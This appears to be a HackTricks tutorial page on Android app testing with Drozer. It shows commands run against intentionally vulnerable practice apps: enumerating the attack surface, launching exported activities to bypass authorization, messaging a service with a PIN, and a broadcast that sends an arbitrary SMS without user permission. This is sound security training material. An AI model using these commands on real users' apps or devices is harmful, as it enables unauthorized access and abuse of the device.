Support HackTricks and get benefits! - Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
# APKs to test * [Sieve](https://github.com/mwrlabs/drozer/releases/download/2.3.4/sieve.apk) (from mrwlabs) * [DIVA](https://payatu.com/wp-content/uploads/2016/01/diva-beta.tar.gz) # Installation Install Drozer Client inside your host. Download it from the [latest releases](https://github.com/mwrlabs/drozer/releases). ```bash pip install drozer-2.4.4-py2-none-any.whl pip install twisted pip install service_identity ``` Download and install drozer APK from the [latest releases](https://github.com/mwrlabs/drozer/releases). At this moment it is [this](https://github.com/mwrlabs/drozer/releases/download/2.3.4/drozer-agent-2.3.4.apk). ``` adb install drozer.apk ``` ## Starting the Server Agent is running on port 31415, we need to [port forward](https://en.wikipedia.org/wiki/Port_forwarding) to establish the communication between the Drozer Client and Agent, here is the command to do so: ``` adb forward tcp:31415 tcp:31415 ``` Finally, **launch** the **application** and press the bottom "**ON**" ![](<../../../.gitbook/assets/image (63).png>) And connect to it: ``` drozer console connect ``` # Interesting Commands | **Commands** | **Description** | | --------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------ | | **Help MODULE** | Shows help of the selected module | | **list** | Shows a list of all drozer modules that can be executed in the current session. This hides modules that you don’t have appropriate permissions to run. | | **shell** | Start an interactive Linux shell on the device, in the context of the Agent. | | **clean** | Remove temporary files stored by drozer on the Android device. | | **load** | Load a file containing drozer commands and execute them in sequence. | | **module** | Find and install additional drozer modules from the Internet. | | **unset** | Remove a named variable that drozer passes to any Linux shells that it spawns. | | **set** | Stores a value in a variable that will be passed as an environmental variable to any Linux shells spawned by drozer. | | **shell** | Start an interactive Linux shell on the device, in the context of the Agent | | **run MODULE** | Execute a drozer module | | **exploit** | Drozer can create exploits to execute in the decide. `drozer exploit list` | | **payload** | The exploits need a payload. `drozer payload list` | ## Package Find the **name** of the package filtering by part of the name: ``` dz> run app.package.list -f sieve com.mwr.example.sieve ``` **Basic Information** of the package: ``` dz> run app.package.info -a com.mwr.example.sieve Package: com.mwr.example.sieve Process Name: com.mwr.example.sieve Version: 1.0 Data Directory: /data/data/com.mwr.example.sieve APK Path: /data/app/com.mwr.example.sieve-2.apk UID: 10056 GID: [1028, 1015, 3003] Shared Libraries: null Shared User ID: null Uses Permissions: - android.permission.READ_EXTERNAL_STORAGE - android.permission.WRITE_EXTERNAL_STORAGE - android.permission.INTERNET Defines Permissions: - com.mwr.example.sieve.READ_KEYS - com.mwr.example.sieve.WRITE_KEYS ``` Read **Manifest**: ``` run app.package.manifest jakhar.aseem.diva ``` **Attack surface** of the package: ``` dz> run app.package.attacksurface com.mwr.example.sieve Attack Surface: 3 activities exported 0 broadcast receivers exported 2 content providers exported 2 services exported is debuggable ``` * **Activities**: Maybe you can start an activity and bypass some kind of authorization that should be prevent you from launching it. * **Content providers**: Maybe you can access private data or exploit some vulnerability (SQL Injection or Path Traversal). * **Services**: * **is debuggable**: [Learn more](./#is-debuggeable) ## Activities An exported activity component’s “android:exported” value is set to **“true”** in the AndroidManifest.xml file: ```markup ``` **List exported activities**: ``` dz> run app.activity.info -a com.mwr.example.sieve Package: com.mwr.example.sieve com.mwr.example.sieve.FileSelectActivity com.mwr.example.sieve.MainLoginActivity com.mwr.example.sieve.PWList ``` **Start activity**: Maybe you can start an activity and bypass some kind of authorization that should be prevent you from launching it. ``` dz> run app.activity.start --component com.mwr.example.sieve com.mwr.example.sieve.PWList ``` You can also start an exported activity from **adb**: * PackageName is com.example.demo * Exported ActivityName is com.example.test.MainActivity ``` adb shell am start -n com.example.demo/com.example.test.MainActivity ``` ## Content Providers This post was so big to be here so **you can** [**access it in its own page here**](exploiting-content-providers.md). ## Services A exported service is declared inside the Manifest.xml: ```markup ``` Inside the code **check** for the **`handleMessage`**function which will **receive** the **message**: ![](<../../../.gitbook/assets/image (194).png>) ### List service ``` dz> run app.service.info -a com.mwr.example.sieve Package: com.mwr.example.sieve com.mwr.example.sieve.AuthService Permission: null com.mwr.example.sieve.CryptoService Permission: null ``` ### **Interact** with a service ``` app.service.send Send a Message to a service, and display the reply app.service.start Start Service app.service.stop Stop Service ``` ### Example Take a look to the **drozer** help for `app.service.send`: ![](<../../../.gitbook/assets/image (196).png>) Note that you will be sending first the data inside "_msg.what_", then "_msg.arg1_" and "_msg.arg2_", you should check inside the code **which information is being used** and where.\ Using the `--extra` option you can send something interpreted by "_msg.replyTo"_, and using `--bundle-as-obj` you create and object with the provided details. In the following example: * `what == 2354` * `arg1 == 9234` * `arg2 == 1` * `replyTo == object(string com.mwr.example.sieve.PIN 1337)` ``` run app.service.send com.mwr.example.sieve com.mwr.example.sieve.AuthService --msg 2354 9234 1 --extra string com.mwr.example.sieve.PIN 1337 --bundle-as-obj ``` ![](<../../../.gitbook/assets/image (195).png>) ## Broadcast Receivers Android apps can send or receive broadcast messages from the Android system and other Android apps, similar to the [publish-subscribe](https://en.wikipedia.org/wiki/Publish%E2%80%93subscribe_pattern) design pattern. These broadcasts are sent when an event of interest occurs. For example, the Android system sends broadcasts when various system events occur, such as when the system boots up or the device starts charging. Apps can also send custom broadcasts, for example, to notify other apps of something that they might be interested in (for example, some new data has been downloaded). Apps can register to receive specific broadcasts. When a broadcast is sent, the system automatically routes broadcasts to apps that have subscribed to receive that particular type of broadcast. This could appear inside the Manifest.xml file: ```markup ``` From: [https://developer.android.com/guide/components/broadcasts](https://developer.android.com/guide/components/broadcasts) After discovering this Broadcast Receivers you should **check the code** of them. Pay special attention to the **`onReceive`**function as it will be handling the messages received. ### **Detect all** broadcast receivers ```bash run app.broadcast.info #Detects all ``` ### Check broadcast receivers of an app ```bash #Check one negative run app.broadcast.info -a jakhar.aseem.diva Package: jakhar.aseem.diva No matching receivers. # Check one positive run app.broadcast.info -a com.google.android.youtube Package: com.google.android.youtube com.google.android.libraries.youtube.player.PlayerUiModule$LegacyMediaButtonIntentReceiver Permission: null com.google.android.apps.youtube.app.common.notification.GcmBroadcastReceiver Permission: com.google.android.c2dm.permission.SEND com.google.android.apps.youtube.app.PackageReplacedReceiver Permission: null com.google.android.libraries.youtube.account.AccountsChangedReceiver Permission: null com.google.android.apps.youtube.app.application.system.LocaleUpdatedReceiver Permission: null ``` ### Broadcast **Interactions** ``` app.broadcast.info Get information about broadcast receivers app.broadcast.send Send broadcast using an intent app.broadcast.sniff Register a broadcast receiver that can sniff particular intents ``` ### Send a message In this example abusing the [FourGoats apk](https://github.com/linkedin/qark/blob/master/tests/goatdroid.apk) Content Provider you can **send an arbitrary SMS** any non-premium destination **without asking** the user for permission. ![](<../../../.gitbook/assets/image (199).png>) ![](<../../../.gitbook/assets/image (197).png>) If you read the code, the parameters "_phoneNumber_" and "_message_" must be sent to the Content Provider. ``` run app.broadcast.send --action org.owasp.goatdroid.fourgoats.SOCIAL_SMS --component org.owasp.goatdroid.fourgoats.broadcastreceivers SendSMSNowReceiver --extra string phoneNumber 123456789 --extra string message "Hello mate!" ``` ## Is debuggeable A prodduction APK should never be debuggeable.\ This mean that you can **attach java debugger** to the running application, inspect it in run time, set breakpoints, go step by step, gather variable values and even change them.[ InfoSec institute has an excellent article](../exploiting-a-debuggeable-applciation.md) on digging deeper when you application is debuggable and injecting runtime code. When an application is debuggable, it will appear in the Manifest: ``` Support HackTricks and get benefits! - Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**